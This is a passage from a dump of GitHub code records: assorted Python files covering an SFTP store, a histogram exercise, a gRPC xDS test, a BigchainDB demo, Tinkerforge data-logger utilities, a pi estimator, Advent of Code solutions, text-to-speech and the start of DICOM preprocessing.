tmp_path='ftp_data_tmp',\n download_check_ftp_file_same=False, upload_check_ftp_file_same=False):\n self._host = host\n self._port = port\n self._user = user\n self._password = password\n\n self.tmp_path = tmp_path\n self.location = str(location).replace('\\\\', '/')\n if not self.location.endswith('/'):\n self.location += '/'\n\n self.client = SftpController(host, port, user, password)\n self.client.connect_until_success()\n self.client.sftp_mkdir_p(self.location)\n self.client.ftp.cwd(self.location)\n self.client.work_dir_now = self.location\n\n self.upload_check_ftp_file_same = upload_check_ftp_file_same\n self.download_check_ftp_file_same = download_check_ftp_file_same\n\n def count_data(self, data_type=None, *args, **kwargs):\n return NotImplementedError\n\n def list_data(self, data_type=None, location=None, *args, **kwargs):\n for root, fs, fns in self.client.walk(location or self.location):\n for fn, file_attribs, date_modified, size in fns:\n yield {\n 'root': root,\n 'filename': fn,\n 'attribs': file_attribs,\n 'modified': date_modified,\n 'size': int(size),\n \"realpath\": self.client.format_realpath(os.path.join(root, fn))\n }\n\n def check_data(self, position, data_type=None, *args, **kwargs):\n return NotImplementedError\n\n def get_data(self, position: typing.Union[str, dict], data_type=None, *args, **kwargs):\n \"\"\"\n position 远程文件名\n self.tmp_path 本地文件夹路径\n self.location 远程文件夹路径\n \"\"\"\n file_name = None\n file_size = 0\n if isinstance(position, str):\n file_name = self.client.format_path(os.path.join(self.location, position))\n elif isinstance(position, dict):\n file_name = position['realpath']\n file_size = position['size']\n if file_name:\n return self.client.download_file_to_some_where(\n file_name,\n self.tmp_path,\n file_size=file_size\n )\n\n def save_data(self, position: str, data, data_type=None, append_offset=0, *args, **kwargs):\n return self.client.upload_file_to_some_where(\n data,\n self.location,\n position,\n check_ftp_file_same=self.upload_check_ftp_file_same,\n append_offset=append_offset\n )\n\n def delete_data(self, position, data_type=None, *args, **kwargs):\n return NotImplementedError\n\n def get_position(self, position, data_type=None, *args, **kwargs):\n return NotImplementedError\n\n def get_data_size(self, position, data_type=None, *args, **kwargs):\n return NotImplementedError\n\n def check_self(self, *args, **kwargs):\n return NotImplementedError\n\n def save_self(self, *args, **kwargs):\n return NotImplementedError\n\n def free_self(self, *args, **kwargs):\n return NotImplementedError\n\n\nif __name__ == '__main__':\n __fs = SftpClientStore('192.168.0.111', 57522, 'test', '1234qwer!@#$QWER', '/home/test', 'data')\n\n for __f in __fs.list_data():\n print(__f)\n # res = __fs.get_data('mysql2ftp_0424_1650809830.csv')\n res = __fs.save_data('mysql2ftp_0424_1650809830.csv','data/mysql2ftp_0424_1650809830.csv')\n","repo_name":"DJMIN/D2D","sub_path":"d22d/model/sftpmodel.py","file_name":"sftpmodel.py","file_ext":"py","file_size_in_byte":31745,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"8"} +{"seq_id":"22294469578","text":"from a2exo1 import val_max\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nLISTE = [0, 3, 10, 4, 8, 1, 0]\nLISTE2 = [0,1,2,3,4]\n\n\ndef histo(F) -> list:\n \"\"\"Crée un histogrammede la liste F\n\n Args:\n F (list): Liste d'entiers\n\n Returns:\n list: L'histogramme\n \"\"\"\n \n NB = max(F)+1 \n H = [0] * NB\n for a in range(len(H)):\n for j in range(len(F)):\n if F[j] 
== a:\n                H[a] += 1\n    return H\n\ndef est_injective(F) -> bool:\n    \"\"\"Indicates whether f:F --> H is injective or not\n\n    Args:\n        F (list): list of integers\n\n    Returns:\n        bool\n    \"\"\"\n    H = histo(F)\n    for i in H:\n        if i > 1:\n            return False\n    return True\n\n\ndef est_surjective(F) -> bool:\n    \"\"\"Indicates whether f:F --> H is surjective or not\n\n    Args:\n        F (list): list of integers\n\n    Returns:\n        bool\n    \"\"\"\n    H = histo(F)\n    for i in H:\n        if i == 0:\n            return False\n    return True\n\n\ndef est_bijective(F) -> bool:\n    \"\"\"Indicates whether f:F --> H is bijective or not\n\n    Args:\n        F (list): list of integers\n\n    Returns:\n        bool\n    \"\"\"\n    return est_injective(F) and est_surjective(F)\n\n\ndef affiche_histo(F):\n    \"\"\"Prints the histogram of the list F to the console\n\n    Args:\n        F (list): List of integers\n    \"\"\"\n    H = histo(F)\n    MAXOCC = val_max(H)\n    for i in range(MAXOCC, -1, -1):\n        for j in range(0, len(H), 1):\n            if H[j] > i:\n                print(\" # |\", end='')\n            else:\n                print(\"   |\", end='')\n        print(\"\\n\")\n    for b in range(max(F) + 1):\n        print(f\" {b} |\", end='')\n    fig, ax = plt.subplots()\n    ax.hist(F)\n    plt.show()\n\ndef test_exo4():\n    print(histo(LISTE2))\n    print(est_injective(LISTE2))\n    print(est_surjective(LISTE2))\n    print(est_bijective(LISTE2))\n\ntest_exo4()\naffiche_histo(LISTE)","repo_name":"Vietco311/L3","sub_path":"Python/Atelier 2/a2exo4.py","file_name":"a2exo4.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"25589031014","text":"import logging\nfrom typing import Tuple\n\nfrom absl import flags\nfrom absl.testing import absltest\n\nfrom framework import xds_url_map_testcase\nfrom framework.helpers import skips\nfrom framework.test_app import client_app\n\n# Type aliases\nHostRule = xds_url_map_testcase.HostRule\nPathMatcher = xds_url_map_testcase.PathMatcher\nGcpResourceManager = xds_url_map_testcase.GcpResourceManager\nDumpedXdsConfig = xds_url_map_testcase.DumpedXdsConfig\nRpcTypeUnaryCall = xds_url_map_testcase.RpcTypeUnaryCall\nRpcTypeEmptyCall = xds_url_map_testcase.RpcTypeEmptyCall\nXdsTestClient = client_app.XdsTestClient\n_Lang = skips.Lang\n\nlogger = logging.getLogger(__name__)\nflags.adopt_module_key_flags(xds_url_map_testcase)\n\n_NUM_RPCS = 50\n\n\nclass TestBasicCsds(xds_url_map_testcase.XdsUrlMapTestCase):\n    @staticmethod\n    def is_supported(config: skips.TestConfig) -> bool:\n        if config.client_lang == _Lang.NODE:\n            return config.version_gte(\"v1.5.x\")\n        return True\n\n    @staticmethod\n    def url_map_change(\n        host_rule: HostRule, path_matcher: PathMatcher\n    ) -> Tuple[HostRule, PathMatcher]:\n        return host_rule, path_matcher\n\n    def xds_config_validate(self, xds_config: DumpedXdsConfig):\n        # Validate Endpoint Configs\n        self.assertNumEndpoints(xds_config, 1)\n        # Validate Node\n        self.assertEqual(\n            self.test_client.ip, xds_config[\"node\"][\"metadata\"][\"INSTANCE_IP\"]\n        )\n        # Validate Listeners\n        self.assertIsNotNone(xds_config.lds)\n        self.assertEqual(self.hostname(), xds_config.lds[\"name\"])\n        # Validate Route Configs\n        self.assertTrue(xds_config.rds[\"virtualHosts\"])\n        # Validate Clusters\n        self.assertEqual(1, len(xds_config.cds))\n        self.assertEqual(\"EDS\", xds_config.cds[0][\"type\"])\n\n    def rpc_distribution_validate(self, test_client: XdsTestClient):\n        rpc_distribution = self.configure_and_send(\n            test_client,\n            rpc_types=[RpcTypeUnaryCall, RpcTypeEmptyCall],\n            num_rpcs=_NUM_RPCS,\n        )\n        self.assertEqual(_NUM_RPCS, rpc_distribution.num_oks)\n\n\nif __name__ 
== \"__main__\":\n absltest.main()\n","repo_name":"grpc/grpc","sub_path":"tools/run_tests/xds_k8s_test_driver/tests/url_map/csds_test.py","file_name":"csds_test.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":39468,"dataset":"github-code","pt":"90"} +{"seq_id":"23859567993","text":"import time\nfrom bigchaindb import Bigchain\n\n# env\n#\nb = Bigchain()\n\n\n# lib\n#\ndef sign_and_write(tx, private_key):\n tx_signed = b.sign_transaction(tx, private_key)\n b.write_transaction(tx_signed)\n return tx_signed\n\n# setup\n#\npvt_key, pub_key = b.generate_keys()\npvt_key2, pub_key2 = b.generate_keys()\n\nprint(\"Public Key:\", pub_key, \"\\n\")\n\n\n# init\n#\n#\n# db initialization\n# first transaction - asset creation - required, asset logic not used for our use-case: storing arbitrary data\nprint(\"DB init - first TX:\")\nasset_payload = {'msg': 'Arbitrary data asset'}\ntx = b.create_transaction(b.me, pub_key, None, 'CREATE', payload=asset_payload)\ntx_signed = sign_and_write(tx, b.me_private)\nprint(\"TX:\", tx_signed, \"\\n\")\n\ntime.sleep(8) # bigchaindb takes a couple of seconds to confirm a transaction\ntx_retrieved = b.get_transaction(tx_signed['id'])\nprint(\"TX retrieved:\", tx_retrieved, \"\\n\")\n\n\n# main\n#\nprint(\"\\n\\nData TX:\")\ndata = { \"amount\": 123, \"date\": \"2016-01-01\" } # <---- arbitrary data, can be encrypted with ecies, ownership based on transaction signer (public key)\ntx2 = b.create_transaction(pub_key, pub_key, tx_retrieved['id'], 'TRANSFER', data)\ntx_signed = sign_and_write(tx2, pvt_key)\nprint(\"TX:\", tx_signed, \"\\n\")\n\ntime.sleep(8)\ntx_retrieved = b.get_transaction(tx_signed['id'])\nprint(\"TX retrieved:\", tx_retrieved, \"\\n\")\n\n\n# http://localhost:8080/#dataexplorer\n#\n# all blocks:\n# r.db('bigchain').table('bigchain')\n#\n# last block:\n# r.db('bigchain').table('bigchain').orderBy(r.desc('block_number')).limit(1)\n#\n#\n# will list everything\n","repo_name":"makevoid/try_bigchaindb","sub_path":"try_bigchaindb.py","file_name":"try_bigchaindb.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"9776511460","text":"import csv # CSV_Writer\nfrom datetime import datetime # CSV_Data\nimport os # CSV_Writer\nfrom shutil import copyfile\nimport sys # CSV_Writer\nimport threading\nimport queue\nimport time # Writer Thread\nimport math\nimport locale\n\nif 'merged_data_logger_modules' not in globals():\n from brickv.data_logger.event_logger import EventLogger\n\ndef utf8_strftime(timestamp, fmt):\n return datetime.fromtimestamp(timestamp).strftime(fmt)\n\ndef timestamp_to_de(timestamp):\n return utf8_strftime(timestamp, '%d.%m.%Y %H:%M:%S')\n\ndef timestamp_to_de_msec(timestamp):\n return timestamp_to_de(timestamp) + ',' + ('%.3f' % math.modf(timestamp)[0])[2:]\n\ndef timestamp_to_us(timestamp):\n return utf8_strftime(timestamp, '%m/%d/%Y %H:%M:%S')\n\ndef timestamp_to_us_msec(timestamp):\n return timestamp_to_us(timestamp) + '.' 
+ ('%.3f' % math.modf(timestamp)[0])[2:]\n\ndef timestamp_to_iso(timestamp, milli=False):\n \"\"\"\n Format a timestamp in ISO 8601 standard\n ISO 8601 = YYYY-MM-DDThh:mm:ss.fff+tz:tz\n 2014-09-10T14:12:05.563+02:00\n \"\"\"\n\n if time.localtime().tm_isdst and time.daylight:\n offset = -time.altzone / 60\n else:\n offset = -time.timezone / 60\n\n tz = '%02d:%02d' % (abs(offset) / 60, abs(offset) % 60)\n\n if offset < 0:\n tz = '-' + tz\n else:\n tz = '+' + tz\n\n if milli:\n ms = '.' + ('%.3f' % math.modf(timestamp)[0])[2:]\n else:\n ms = ''\n\n return utf8_strftime(timestamp, '%Y-%m-%dT%H:%M:%S') + ms + tz\n\ndef timestamp_to_iso_msec(timestamp):\n return timestamp_to_iso(timestamp, True)\n\ndef timestamp_to_unix(timestamp):\n return str(int(timestamp))\n\ndef timestamp_to_unix_msec(timestamp):\n return '%.3f' % timestamp\n\ndef timestamp_to_strftime(timestamp, time_format):\n try:\n return utf8_strftime(timestamp, time_format)\n except Exception as e:\n return 'Error: ' + str(e).replace('\\n', ' ')\n\nclass DataLoggerException(Exception):\n # Error Codes\n DL_MISSING_ARGUMENT = -1 # Missing Arguments in Config File\n DL_FAILED_VALIDATION = -2 # Validation found errors in the configuration file\n DL_CRITICAL_ERROR = -42 # For all other critical errors\n\n def __init__(self, err_code=DL_CRITICAL_ERROR, desc=\"No Description!\"):\n self.value = err_code\n self.description = desc\n\n def __str__(self):\n return str(\"ERROR[DL\" + str(self.value) + \"]: \" + str(self.description))\n\n\n'''\n/*---------------------------------------------------------------------------\n CSVData\n ---------------------------------------------------------------------------*/\n '''\n\n\nclass CSVData:\n \"\"\"\n This class is used as a temporary save spot for all csv relevant data.\n \"\"\"\n\n def __init__(self, timestamp, name, uid, var_name, raw_data, var_unit):\n \"\"\"\n timestamp -- time data was\n name -- display name of Brick(let)\n uid -- UID of Brick(let)\n var_name -- name of logged value\n raw_data -- logged value\n var_unit -- unit of logged value\n \"\"\"\n self.timestamp = timestamp # datatime object\n self.name = name\n self.uid = uid\n self.var_name = var_name\n self.raw_data = raw_data\n self.var_unit = var_unit\n\n def __str__(self):\n \"\"\"\n Simple Debug function for easier display of the object.\n \"\"\"\n return \"[TIME=\" + str(self.timestamp) + \\\n \";NAME=\" + str(self.name) + \\\n \";UID=\" + str(self.uid) + \\\n \";VAR=\" + str(self.var_name) + \\\n \";RAW=\" + str(self.raw_data) + \\\n \";UNIT=\" + str(self.var_unit) + \"]\"\n\n'''\n/*---------------------------------------------------------------------------\n LoggerTimer\n ---------------------------------------------------------------------------*/\n '''\n\n\nclass LoggerTimer:\n \"\"\"This class provides a timer with a repeat functionality based on a interval\"\"\"\n\n def __init__(self, interval, func_name, var_name, device):\n \"\"\"\n interval -- the repeat interval in seconds\n func -- the function which will be called\n \"\"\"\n if interval < 0:\n interval = 0\n\n self._interval = interval # in seconds\n self._func_name = func_name\n self._var_name = var_name\n self._device = device\n self._enable_ref = None\n self._stop_queue = None\n self._thread = None\n\n def _loop(self, enable_ref, stop_queue):\n monotonic_timestamp = time.monotonic()\n\n while enable_ref[0]:\n elapsed = time.monotonic() - monotonic_timestamp\n remaining = max(self._interval - elapsed, 0)\n\n try:\n stop_queue.get(timeout=remaining)\n except 
queue.Empty:\n pass\n else:\n break\n\n monotonic_timestamp = time.monotonic()\n\n if not enable_ref[0]:\n break\n\n getattr(self._device, self._func_name)(self._var_name)\n\n def start(self):\n if self._interval == 0:\n return\n\n if self._thread != None:\n return\n\n self._enable_ref = [True]\n self._stop_queue = queue.Queue()\n self._thread = threading.Thread(target=self._loop, args=(self._enable_ref, self._stop_queue), daemon=True)\n self._thread.start()\n\n def stop_and_join(self):\n if self._interval == 0:\n return\n\n if self._thread == None:\n return\n\n self._enable_ref[0] = False\n self._stop_queue.put(None)\n self._thread.join(5)\n\n self._enable_ref = None\n self._stop_queue = None\n self._thread = None\n\n\"\"\"\n/*---------------------------------------------------------------------------\n Utilities\n ---------------------------------------------------------------------------*/\n\"\"\"\n\n\nclass Utilities:\n \"\"\"\n This class provides some utility functions for the data logger project\n \"\"\"\n\n def parse_to_int(string):\n \"\"\"\n Returns an integer out of a string.\n 0(Zero) -- if string is negative or an exception raised during the converting process.\n \"\"\"\n try:\n ret = int(float(string))\n if ret < 0:\n ret = 0\n return ret\n except ValueError:\n # EventLogger.debug(\"DataLogger.parse_to_int(\" + string + \") could not be parsed! Return 0 for the Timer.\")\n return 0\n\n parse_to_int = staticmethod(parse_to_int)\n\n def parse_to_bool(bool_string):\n \"\"\"\n Returns a 'True', if the string is equals to 'true' or 'True'.\n Otherwise it'll return a False\n \"\"\"\n if bool_string == \"true\" or bool_string == \"True\" or bool_string == \"TRUE\":\n return True\n else:\n return False\n\n parse_to_bool = staticmethod(parse_to_bool)\n\n def parse_device_name(device_name):\n tmp = device_name.split(\"[\")\n if len(tmp) == 1:\n return tmp[0], None\n\n device = tmp[0][:len(tmp[0]) - 1]\n uid = tmp[1][:len(tmp[1]) - 1]\n\n return device, uid\n\n parse_device_name = staticmethod(parse_device_name)\n\n def replace_right(source, target, replacement, replacements=None):\n return replacement.join(source.rsplit(target, replacements))\n\n replace_right = staticmethod(replace_right)\n\n def check_file_path_exists(file_path):\n try:\n dir_path = os.path.dirname(file_path)\n if dir_path == \"\" or dir_path is None:\n if file_path == \"\" or file_path is None:\n # no filename - dir\n return False\n else:\n # filename - but no dir\n return True\n elif os.path.isdir(dir_path):\n # dir found\n return True\n return False\n except Exception:\n return False\n\n check_file_path_exists = staticmethod(check_file_path_exists)\n\n def is_valid_string(string_value, min_length=0):\n \"\"\"\n Returns True if 'string_value' is of type str and has at least a size of\n 'min_length'\n \"\"\"\n if not isinstance(string_value, str) or len(string_value) < min_length:\n return False\n return True\n\n is_valid_string = staticmethod(is_valid_string)\n\n\n'''\n/*---------------------------------------------------------------------------\n CSVWriter\n ---------------------------------------------------------------------------*/\n '''\n\n\nclass CSVWriter:\n \"\"\"\n This class provides the actual open/write functions, which are used by the CSVWriterJob class to write logged data into\n a CSV formatted file.\n \"\"\"\n\n def __init__(self, file_path, max_file_count=1, max_file_size=0):\n \"\"\"\n file_path = Path to the csv file\n \"\"\"\n self._file_path = file_path\n # check if file path exists\n if not 
Utilities.check_file_path_exists(self._file_path):\n raise Exception(\"File Path not found! -> \" + str(self._file_path))\n\n self._raw_file = None\n self._csv_file = None\n\n if max_file_size < 0:\n max_file_size = 0\n self._file_size = max_file_size\n\n # HINT: create always at least 1 backup file!\n if max_file_count < 1:\n max_file_count = 1\n\n self._file_count = max_file_count\n\n self._open_file_A()\n\n def _open_file_A(self):\n \"\"\"Opens a file in append mode.\"\"\"\n\n # newline problem solved + import sys\n if sys.version_info >= (3, 0, 0):\n self._raw_file = open(self._file_path, 'a', newline='', encoding='utf-8') # FIXME append or write?!\n else:\n self._raw_file = open(self._file_path, 'ab', encoding='utf-8')\n\n self._csv_file = csv.writer(self._raw_file, delimiter=\";\", quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\n # if the file is empty, create a csv header\n if self._file_is_empty():\n self._write_header()\n\n def _file_is_empty(self):\n \"\"\"\n Simple check if the file is empty.\n Return:\n True - File is empty or missing\n False - File is not empty\n \"\"\"\n try:\n if os.stat(self._file_path).st_size > 0:\n return False\n else:\n return True\n except OSError:\n return True\n\n def _write_header(self):\n \"\"\"Writes a csv header into the file\"\"\"\n if not self._file_is_empty():\n EventLogger.debug(\"File is not empty\")\n return\n\n EventLogger.debug(\"CSVWriter._write_header() - done\")\n self._csv_file.writerow([\"TIME\"] + [\"NAME\"] + [\"UID\"] + [\"VAR\"] + [\"RAW\"] + [\"UNIT\"])\n self._raw_file.flush()\n\n def write_data_row(self, csv_data):\n \"\"\"\n Write a row into the csv file.\n Return:\n True - Row was written into thee file\n False - Row was not written into the File\n \"\"\"\n if self._raw_file is None or self._csv_file is None:\n return False\n\n self._csv_file.writerow([csv_data.timestamp] + [csv_data.name] + [csv_data.uid] + [csv_data.var_name] + [str(csv_data.raw_data)] + [csv_data.var_unit])\n self._raw_file.flush()\n\n if self._file_size > 0:\n self._rolling_file()\n\n return True\n\n def set_file_path(self, new_file_path):\n \"\"\"\n Sets a new file path.\n Return:\n True - File path was updated and successfully opened\n False - File path could not be updated or opened\n \"\"\"\n if not self.close_file():\n return False\n\n self._file_path = new_file_path\n self._open_file_A()\n return True\n\n def reopen_file(self):\n \"\"\"\n Tries to reopen a file, if the file was manually closed.\n Return:\n True - File could be reopened\n False - File could not be reopened\n \"\"\"\n if self._raw_file is not None and self._csv_file is not None:\n return False\n\n self._open_file_A()\n return True\n\n def close_file(self):\n \"\"\"\n Tries to close the current file.\n Return:\n True - File was close\n False - File could not be closed\n \"\"\"\n if self._raw_file is None or self._csv_file is None:\n return False\n try:\n self._raw_file.close()\n self._csv_file = None\n self._raw_file = None\n return True\n\n except ValueError:\n return False\n\n def _rolling_file(self):\n f_size = os.path.getsize(self._file_path)\n if f_size > self._file_size:\n EventLogger.info(\n \"Max Filesize(\" + \"%.3f\" % (self._file_size / 1024.0 / 1024.0) + \" MB) reached! Rolling Files...\")\n self._roll_files()\n\n # FIXME: only files with a . 
are working!\n def _roll_files(self):\n i = self._file_count\n\n self.close_file()\n\n while True:\n if i == 0:\n # first file reached\n break\n\n tmp_file_name = Utilities.replace_right(self._file_path, \".\", \"(\" + str(i) + \").\", 1)\n\n if os.path.exists(tmp_file_name):\n if i == self._file_count:\n # max file count -> delete\n os.remove(tmp_file_name)\n EventLogger.debug(\"Rolling Files... removed File(\" + str(i) + \")\")\n\n else:\n # copy file and remove old\n copyfile(tmp_file_name, Utilities.replace_right(self._file_path, \".\", \"(\" + str(i + 1) + \").\", 1))\n EventLogger.debug(\"Rolling Files... copied File(\" + str(i) + \") into (\" + str(i + 1) + \")\")\n os.remove(tmp_file_name)\n\n i -= 1\n\n if self._file_count != 0:\n copyfile(self._file_path, Utilities.replace_right(self._file_path, \".\", \"(\" + str(1) + \").\", 1))\n EventLogger.debug(\"Rolling Files... copied original File into File(1)\")\n os.remove(self._file_path)\n self._open_file_A()\n","repo_name":"Tinkerforge/brickv","sub_path":"src/brickv/data_logger/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":14233,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"90"} +{"seq_id":"15052091119","text":"\n# import necessary libraries\nimport math\nimport numpy as np\nimport random\nimport time\n\n\ndef main():\n\n # start the clock\n starttime = time.time()\n \n # set number of random points to check\n npoints = int( 1e9 )\n \n # initialize counter for points in circle \n count = 0\n \n for i in range( npoints ):\n \n # choose random location\n x = random.uniform( -1.0, 1.0 )\n y = random.uniform( -1.0, 1.0 )\n \n # check distance from origin to see if it is within the circle\n d = math.sqrt( x*x + y*y )\n if d < 1:\n count += 1\n \n # calculate the ratio of points that are in the circle to total points\n P = float( count ) / float( npoints )\n \n # estimate pi\n pi = 4.0 * P\n \n # get runtime\n runtime = ( time.time() - starttime )\n \n print( \"pi (estimate) = \", pi )\n print( \"num points = \", npoints )\n print( \"runtime [s] = \", str( round( runtime, 4) ) )\n \n\nif __name__ == '__main__':\n import sys\n sys.exit( main() )\n","repo_name":"ecetter/inthpc425","sub_path":"pi_example/pi_serial.py","file_name":"pi_serial.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"19213954287","text":"from abstract_nested_data import AbstractNestedData\nfrom utility import Utility\n\n\nclass NestedObject(AbstractNestedData):\n\n def __init__(self, utility: Utility):\n super().__init__(utility=utility)\n\n def print_depth(self, data: dict):\n try:\n print('Solution for nested object')\n processed_data: dict = self.utility.convert_data_to_dict(raw_data=data)\n self.utility.print_dict_key_level(dict_data=processed_data)\n except Exception as exception:\n print(exception.args[0])\n finally:\n print('\\n')\n","repo_name":"ShaonDey/python_code_test","sub_path":"nested_object.py","file_name":"nested_object.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"2958101214","text":"from input import input\n\nmostCalories = 0\nsecondMostCalories = 0\nthirdMostCalories = 0\ncurrentCalories = 0\n\ndef rankCalories(calories) -> None:\n global mostCalories\n global secondMostCalories\n global thirdMostCalories\n \n if calories > mostCalories:\n thirdMostCalories = 
secondMostCalories\n secondMostCalories = mostCalories\n mostCalories = calories\n return\n if calories > secondMostCalories:\n thirdMostCalories = secondMostCalories\n secondMostCalories = calories\n return\n if calories > thirdMostCalories:\n thirdMostCalories = calories\n\n\ninCalculation = False\n\nfor food in input.splitlines():\n if food == '':\n rankCalories(currentCalories)\n currentCalories = 0\n inCalculation = False\n continue\n\n currentCalories += int(food)\n inCalculation = True\n\nif inCalculation:\n rankCalories(currentCalories)\n currentCalories = 0\n inCalculation = False\n\nprint(mostCalories + secondMostCalories + thirdMostCalories)","repo_name":"Amphyros/adventofcode-2022","sub_path":"day1/1-2.py","file_name":"1-2.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"5855594437","text":"f = [l.strip() for l in open(\"day1.txt\")]\n\nQ = []\nfor i in (\"\\n\".join(f)).split(\"\\n\\n\"):\n q = 0\n for j in i.split(\"\\n\"):\n q += int(j)\n Q.append(q)\n\ns = sorted(Q)\nprint(s)\nprint(s[-1] + s[-2] + s[-3])\nprint(max(Q))\n","repo_name":"AntonThoresson/AOC","sub_path":"day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"17146533270","text":"import pyttsx3\r\n\r\nengine = pyttsx3.init('sapi5')\r\nvoices = engine.getProperty('voices')\r\nengine.setProperty('voice', voices[1].id) # [1] represents the female voice, if u need male voice type this [0]\r\n\r\ndef speak(audio):\r\n engine.say(audio)\r\n engine.runAndWait()\r\n\r\nspeak(\"hey buddy,have a nice day\") # Type here what do u want to hear at the output window\r\n","repo_name":"hacksmashes/Text-to-speech-conversion-using-python","sub_path":"text to speech.py","file_name":"text to speech.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"22079834480","text":"#!/usr/bin/env python3\nfrom subscripts.utilities import run,is_integer,write,smart_copy\nfrom os.path import join\nfrom parsl.app.app import python_app\nfrom shutil import copyfile\n\n@python_app(executors=['s1'], cache=True)\ndef s1_1_dicom_preproc(params, inputs=[]):\n import time,tarfile\n from subscripts.utilities import run,record_apptime,record_start,smart_remove,smart_copy, \\\n smart_mkdir,write,strip_trailing_slash\n from os.path import join,split,exists,basename\n from shutil import copyfile\n from glob import glob\n import numpy as np\n sdir = params['sdir']\n stdout = params['stdout']\n T1_dicom_dir = params['T1_dicom_dir']\n DTI_dicom_dir = params['DTI_dicom_dir']\n extra_b0_dirs = params['extra_b0_dirs']\n src_nifti_dir = params['src_nifti_dir']\n\n sourcedata_dir = params['sourcedata_dir']\n rawdata_dir = params['rawdata_dir']\n derivatives_dir = params['derivatives_dir']\n bids_dicom_dir = params['bids_dicom_dir']\n bids_nifti_dir = params['bids_nifti_dir']\n subject_name = params['subject_name']\n session_name = params['session_name']\n\n container = params['container']\n DTI_dicom_dir = params['DTI_dicom_dir']\n T1_dicom_dir = params['T1_dicom_dir']\n dicom_tmp_dir = join(sdir, 'tmp_dicom')\n\n smart_remove(dicom_tmp_dir)\n smart_mkdir(dicom_tmp_dir)\n \n smart_mkdir(join(bids_nifti_dir, \"dwi\"))\n smart_mkdir(join(bids_nifti_dir, \"anat\"))\n DTI_dicom_tmp_dir = join(dicom_tmp_dir, 'DTI')\n T1_dicom_tmp_dir = 
join(dicom_tmp_dir, 'T1')\n extra_b0_tmp_dirs = [join(dicom_tmp_dir, basename(dirname)) for dirname in extra_b0_dirs]\n\n hardi_file = join(bids_nifti_dir, \"dwi\", \"{}_{}_dwi.nii.gz\".format(subject_name, session_name))\n T1_file = join(bids_nifti_dir, \"anat\", \"{}_{}_T1w.nii.gz\".format(subject_name, session_name))\n bvals_file = join(bids_nifti_dir, \"dwi\", \"{}_{}_dwi.bval\".format(subject_name, session_name))\n bvecs_file = join(bids_nifti_dir, \"dwi\", \"{}_{}_dwi.bvec\".format(subject_name, session_name))\n\n start_time = time.time()\n record_start(params)\n\n if src_nifti_dir:\n smart_copy(join(src_nifti_dir, \"hardi.nii.gz\"), hardi_file)\n smart_copy(join(src_nifti_dir, \"anat.nii.gz\"), T1_file)\n smart_copy(join(src_nifti_dir, \"bvals\"), bvals_file)\n smart_copy(join(src_nifti_dir, \"bvecs\"), bvecs_file)\n elif T1_dicom_dir and DTI_dicom_dir:\n smart_remove(DTI_dicom_tmp_dir)\n smart_remove(T1_dicom_tmp_dir)\n\n # copy everything from DICOM dir except old NiFTI outputs\n smart_copy(T1_dicom_dir, T1_dicom_tmp_dir, ['*.nii', '*.nii.gz', '*.bval', '*.bvec'])\n write(stdout, 'Copied {} to {}'.format(T1_dicom_dir, T1_dicom_tmp_dir))\n smart_copy(DTI_dicom_dir, DTI_dicom_tmp_dir, ['*.nii', '*.nii.gz', '*.bval', '*.bvec'])\n write(stdout, 'Copied {} to {}'.format(DTI_dicom_dir, DTI_dicom_tmp_dir))\n for (extra_b0_dir, extra_b0_tmp_dir) in zip(extra_b0_dirs, extra_b0_tmp_dirs):\n smart_remove(extra_b0_tmp_dir)\n smart_copy(extra_b0_dir, extra_b0_tmp_dir, ['*.nii', '*.nii.gz', '*.bval', '*.bvec'])\n write(stdout, 'Copied {} to {}'.format(extra_b0_dir, extra_b0_tmp_dir))\n\n # Run dcm2nii in script to ensure Singularity container finds the right paths\n dicom_sh = join(sdir, \"dicom.sh\")\n smart_remove(dicom_sh)\n\n # Convert DTI dicom to many individual NiFTI files\n dicom_sh_contents = \"dcm2nii -4 N\"\n for file in glob(join(DTI_dicom_tmp_dir, '*.dcm')):\n dicom_sh_contents += \" \" + file\n\n for extra_b0_tmp_dir in extra_b0_tmp_dirs:\n dicom_sh_contents += \"\\ndcm2nii -4 N\"\n for file in glob(join(extra_b0_tmp_dir, '*.dcm')):\n dicom_sh_contents += \" \" + file\n\n dicom_sh_contents += \"\\ndcm2nii -4 N\"\n for file in glob(join(T1_dicom_tmp_dir, '*.dcm')):\n dicom_sh_contents += \" \" + file\n\n if container:\n odir = split(sdir)[0]\n write(dicom_sh, dicom_sh_contents.replace(odir, \"/share\"))\n else:\n write(dicom_sh, dicom_sh_contents)\n write(stdout, 'Running dcm2nii with script {}'.format(dicom_sh))\n run(\"sh \" + dicom_sh, params)\n\n b0_slices = {}\n normal_slices = []\n all_slices = {}\n\n # Check that dcm2nii outputs exist\n found_bvals = glob(join(DTI_dicom_tmp_dir, '*.bval'))\n found_bvecs = glob(join(DTI_dicom_tmp_dir, '*.bvec'))\n found_T1 = glob(join(T1_dicom_tmp_dir, 'co*.nii.gz'))\n\n if len(found_bvals) != 1:\n raise Exception('Did not find exactly one bvals output in {}'.format(DTI_dicom_tmp_dir))\n else:\n copyfile(found_bvals[0], bvals_file)\n\n if len(found_bvecs) != 1:\n raise Exception('Did not find exactly one bvecs output in {}'.format(DTI_dicom_tmp_dir))\n else:\n copyfile(found_bvecs[0], bvecs_file)\n\n # If we don't find the usual T1 file name, just try any 